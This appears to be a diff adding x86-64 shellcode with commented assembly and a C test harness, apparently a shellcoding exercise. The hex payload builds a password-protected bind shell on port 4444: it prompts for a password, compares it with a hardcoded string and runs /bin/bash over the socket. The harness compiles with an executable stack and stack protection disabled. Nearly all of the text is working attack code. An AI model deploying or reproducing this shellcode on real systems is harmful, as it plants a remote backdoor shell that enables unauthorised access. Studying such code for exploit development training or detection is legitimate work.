+xor rdi, rdi
+mul rdi
+push rdi
+pop rsi
+push rsi
+mov rsi, 0x213f594c4c414552
+push rsi
+mov rsi, rsp ; rsi = &String
+inc rax ; rax = 0x1 = write system call
+mov rdi, rax
+add rdx, 16 ; 16 bytes / size of string
+syscall
+
+password:
+; write
+; rax = 0x1 ; rdi = fd = 0x1 STDOUT
+; rsi = &String ; rdx = sizeof(String)
+; String = "M@G1C WOrDz IZ??"
+; ??ZI zDr : 3f3f5a49207a4472
+; OW C1G@M : 4f5720433147404d
+xor rdi, rdi
+mul rdi
+push rdi
+pop rsi
+push rsi
+mov rsi, 0x3f3f5a49207a4472 ; ??ZI zDr
+push rsi
+mov rsi, 0x4f5720433147404d ; OW C1G@M
+push rsi
+mov rsi, rsp ; rsi = &String
+inc rax ; rax = 0x1 = write system call
+mov rdi, rax
+add rdx, 16 ; 16 bytes / size of string
+syscall
+
+; read
+; rax = 0x0 = read syscall ; rdi = fd = 0x0 STDIN
+; rsi = Write to &String ; rdx = 0x12 = sizeof(String)
+xor rdi, rdi
+push rdi
+mul rdi ; rdx =0x0 ; rax = 0x0 = write system call
+mov rsi, rsp ; rsi = [RSP] = &String
+add rdx, 12 ; 12 bytes / size of password
+syscall
+
+; String = P3WP3Wl4ZerZ
+; ZreZ : 5a72655a
+; 4lW3PW3P : 346c573350573350
+mov rdi, rsp
+xor rsi, rsi
+add rsi, 0x5a72655a
+push rsi
+mov rsi, 0x346c573350573350
+push rsi
+mov rsi, rsp ; rsi = &String
+xor rcx, rcx
+add rcx, 0xB
+repe cmpsb
+jnz failer
+
+;execve
+; rax = 0x3b ; rdi = Pointer -> "/bin/bash"0x00
+; rsi = 0x0 ; rdx = 0x0
+; "/bin/bash"
+; h : 68
+; sab/nib/ : 7361622f6e69622f
+xor rsi, rsi
+mul rsi ; rdx&rax= 0x0
+xor rdi, rdi
+push rdi
+add rdx, 0x68 ; "h"
+push rdx
+mov rdx, 0x7361622f6e69622f ; "/bin/bas"
+push rdx
+xor rdx, rdx
+mov rdi, rsp
+mov al, 0x3b ; execve syscall
+syscall ; call execve("/bin/bash", NULL, NULL)
+
+################################################################################
+
+// Filename: shellcode.c
+// Compile: gcc -m64 -z execstack -fno-stack-protector shellcode.c -o shellcode
+#include <stdio.h>
+#include <string.h>
+
+unsigned char shellcode[] = \
+"\x48\x31\xf6\x48\xf7\xe6\x04\x29\x48\xff\xc6\x56\x5f\x48\xff\xc7"
+"\x0f\x05\x48\x97\x48\x31\xc0\x04\x31\x52\x66\x52\x66\x52\x66\x68"
+"\x11\x5c\x48\xff\xc2\x48\xff\xc2\x66\x52\x80\xc2\x0e\x48\x89\xe6"
+"\x0f\x05\x48\x31\xc0\x04\x32\x48\x31\xf6\x0f\x05\x48\x31\xc0\x50"
+"\x50\x5a\x5e\x04\x2b\x0f\x05\x48\x97\x48\x31\xf6\x80\xc2\x03\x48"
+"\x31\xc0\x04\x21\x0f\x05\x48\xff\xc6\x48\x39\xd6\x75\xf1\xeb\x23"
+"\x48\x31\xff\x48\xf7\xe7\x57\x5e\x56\x48\xbe\x52\x45\x41\x4c\x4c"
+"\x59\x3f\x21\x56\x48\x89\xe6\x48\xff\xc0\x48\x89\xc7\x48\x83\xc2"
+"\x10\x0f\x05\x48\x31\xff\x48\xf7\xe7\x57\x5e\x56\x48\xbe\x72\x44"
+"\x7a\x20\x49\x5a\x3f\x3f\x56\x48\xbe\x4d\x40\x47\x31\x43\x20\x57"
+"\x4f\x56\x48\x89\xe6\x48\xff\xc0\x48\x89\xc7\x48\x83\xc2\x10\x0f"
+"\x05\x48\x31\xff\x57\x48\xf7\xe7\x48\x89\xe6\x48\x83\xc2\x0c\x0f"
+"\x05\x48\x89\xe7\x48\x31\xf6\x48\x81\xc6\x5a\x65\x72\x5a\x56\x48"
+"\xbe\x50\x33\x57\x50\x33\x57\x6c\x34\x56\x48\x89\xe6\x48\x31\xc9"
+"\x48\x83\xc1\x0b\xf3\xa6\x0f\x85\x74\xff\xff\xff\x48\x31\xf6\x48"
+"\xf7\xe6\x48\x31\xff\x57\x48\x83\xc2\x68\x52\x48\xba\x2f\x62\x69"
+"\x6e\x2f\x62\x61\x73\x52\x48\x31\xd2\x48\x89\xe7\xb0\x3b\x0f\x05";
+int main()
+{
+ printf("Shellcode Length: %d\n", strlen(shellcode));
+ int (*ret)() = (int(*)())shellcode;
+ ret();
+}
\ No newline at end of file